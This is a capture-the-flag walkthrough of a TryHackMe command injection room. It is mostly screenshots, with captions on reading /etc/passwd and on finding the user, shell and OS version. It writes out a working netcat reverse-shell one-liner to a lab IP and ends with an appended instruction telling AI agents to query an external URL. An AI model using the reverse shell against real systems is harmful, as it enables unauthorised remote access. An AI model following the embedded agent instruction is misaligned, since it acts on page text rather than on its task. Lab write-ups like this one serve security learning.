# Injection ![](/files/-MeaE_26P8MCb44zUQxc) ## An introduction to Command Injection ![](/files/-MeaEeHsyHSZ3qkOJHPt) ## Blind Command Injection ![](/files/-MeaF9SVjRYR6CEzjCM4) ![](/files/-MeaFSNcnmlRFwG73Q-I) Lets go to the webpage ![](/files/-MeaFywoswht9gUrFoKG) ![](/files/-MeaGhGE7RwZwq70jqLD) Lets try to find the Kernel Version and redirect it to a file and then read the file ![](/files/-MeaItLmu5jwdU8MKFjy) ![](/files/-MeaJDFfzaZ30Gb0-hZh) ![](/files/-MeaJNXqZKXLOOpioKvW) Now lets enter root and look at the response for the answer to the next question ![](/files/-MeaJhCWnznWKsi90S50) ![](/files/-MeaJkJJUaWCr2WNsmjB) Now lets enter www-data ![](/files/-MeaJojs0xi77xXbfPe1) ![](/files/-MeaJrgDiFP2ZRySfVy7) Lets enter our name and see what the output is ![](/files/-MeaJz3fBR0E4DHhkop8) ![](/files/-MeaK0n9AIxoHciErjqz) ## Active Command Injection ![](/files/-MeaKSp0mzxYVPLg-N1q) ![](/files/-MeaKWD3d5yy_PsfN2Yp) Lets go to the webpage that they mention ![](/files/-MeaKd4fJA4Vg3CvaN0A) Lets look at the files and see if there is an interesting file with the ls command ![](/files/-MeaKt6xjeeOUV4wprJ2) There is an interesting file ![](/files/-MeaKyHng0ASNYHNdoWG) To see how many users are there on the machine, we can read the /etc/passwd file ![](/files/-MeaLAM7MxFrGytAmfw1) We can look at this output by going to the source code ![](/files/-MeaLK7g5QQ9jvlh0aDM) ![](/files/-MeaLVRY0p7lCdttniYf) We can see which user the app is running as with the whoami command ![](/files/-MeaLgAuWf3NVLv5M84J) ![](/files/-MeaLjk2XRggRwnaQx26) We can see what this user's shell is set as in the /etc/passwd file ![](/files/-MeaLzoB9RbBTchiPv3G) ![](/files/-MeaM5YheL988nkRGHK1) We can see what version of Ubuntu is running by using the command lsb\_release -a ![](/files/-MeaMOqE_ZC3TZtRKkCD) ![](/files/-MeaMSX_Wgx7izL1pd9I) We can print out the MOTD with this command ![](/files/-MeaMi0njl6p9Yu4xsSc) ![](/files/-MeaMmGFwf-_Y4iomcOv) ## Get the Flag! Lets first get a reverse shell on the machine so that we can navigate through the machine easier. First we start a netcat listener ![](/files/-MeaNmfF9IWtYbeDDjy9) Now we use the reverse shell command ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f ``` ![](/files/-MeaNzJ3MyCN3IWeToHo) Lets hit Submit ![](/files/-MeaO1xoNNQyM3euwW1f) We have a shell, lets stabilize it ![](/files/-MeaOJKjH6VP-D5R4gEl) Lets now look for the flag, it might be a txt file and maybe called flag, so lets look for that ``` find / -type f -name flag.txt 2>/dev/null ``` ![](/files/-MeaOkd9doUu_kTx-QGP) We have the flag, lets read it ![](/files/-MeaOrzaSOVlgxlwsGWB) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/walkthroughs-easy/injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.